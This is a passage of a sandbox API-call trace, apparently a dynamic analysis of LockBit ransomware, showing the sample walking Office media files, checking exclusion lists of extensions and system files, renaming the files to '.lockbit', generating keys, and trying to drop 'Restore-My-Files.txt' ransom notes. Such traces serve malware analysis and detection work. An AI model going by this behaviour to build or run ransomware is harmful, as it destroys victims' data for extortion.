hTemplateFile=0x0) returned 0xffffffff [0201.122] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfa3500, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcfa3500, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18231_.WMF", cAlternateFileName="")) returned 1 [0201.123] lstrcmpiW (lpString1=".", lpString2="BD18231_.WMF") returned -1 [0201.123] lstrcmpiW (lpString1="..", lpString2="BD18231_.WMF") returned -1 [0201.123] PathFindExtensionW (pszPath="BD18231_.WMF") returned=".WMF" [0201.123] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.123] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.124] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.124] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18231_.WMF") returned 1 [0201.125] lstrcmpiW (lpString1="ntldr", lpString2="BD18231_.WMF") returned 1 [0201.125] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18231_.WMF") returned 1 [0201.125] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18231_.WMF") returned 1 [0201.125] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18231_.WMF") returned -1 [0201.125] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18231_.WMF") returned 1 [0201.125] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18231_.WMF") returned 1 [0201.125] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.125] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF") returned=".WMF" [0201.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.125] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.126] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.126] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF.lockbit") returned 79 [0201.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18231_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.128] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.128] malloc (_Size=0x40068) returned 0x1ff1e60 [0201.128] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1660) returned 1 [0201.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0201.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0201.129] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.138] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.138] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.139] free (_Block=0x1fa2ed8) [0201.139] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.139] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.139] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4763d200, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4763d200, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18232_.WMF", cAlternateFileName="")) returned 1 [0201.140] lstrcmpiW (lpString1=".", lpString2="BD18232_.WMF") returned -1 [0201.140] lstrcmpiW (lpString1="..", lpString2="BD18232_.WMF") returned -1 [0201.140] PathFindExtensionW (pszPath="BD18232_.WMF") returned=".WMF" [0201.140] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.140] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.141] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.141] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18232_.WMF") returned 1 [0201.142] lstrcmpiW (lpString1="ntldr", lpString2="BD18232_.WMF") returned 1 [0201.142] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18232_.WMF") returned 1 [0201.142] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18232_.WMF") returned 1 [0201.142] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18232_.WMF") returned -1 [0201.142] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18232_.WMF") returned 1 [0201.142] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18232_.WMF") returned 1 [0201.142] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.142] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF") returned=".WMF" [0201.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.142] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.142] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.143] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.144] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.144] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF.lockbit") returned 79 [0201.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18232_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0201.145] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.145] malloc (_Size=0x40068) returned 0x3df0008 [0201.145] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1644) returned 1 [0201.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.146] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.150] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.150] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.150] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.152] free (_Block=0x1fa2ed8) [0201.152] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.152] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.152] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a76a200, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcc71fe0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5a76a200, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18233_.WMF", cAlternateFileName="")) returned 1 [0201.152] lstrcmpiW (lpString1=".", lpString2="BD18233_.WMF") returned -1 [0201.152] lstrcmpiW (lpString1="..", lpString2="BD18233_.WMF") returned -1 [0201.152] PathFindExtensionW (pszPath="BD18233_.WMF") returned=".WMF" [0201.152] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.152] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.153] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.154] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.154] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18233_.WMF") returned 1 [0201.155] lstrcmpiW (lpString1="ntldr", lpString2="BD18233_.WMF") returned 1 [0201.155] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18233_.WMF") returned 1 [0201.155] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18233_.WMF") returned 1 [0201.155] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18233_.WMF") returned -1 [0201.155] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18233_.WMF") returned 1 [0201.155] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18233_.WMF") returned 1 [0201.155] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.155] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF") returned=".WMF" [0201.155] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.155] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.155] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 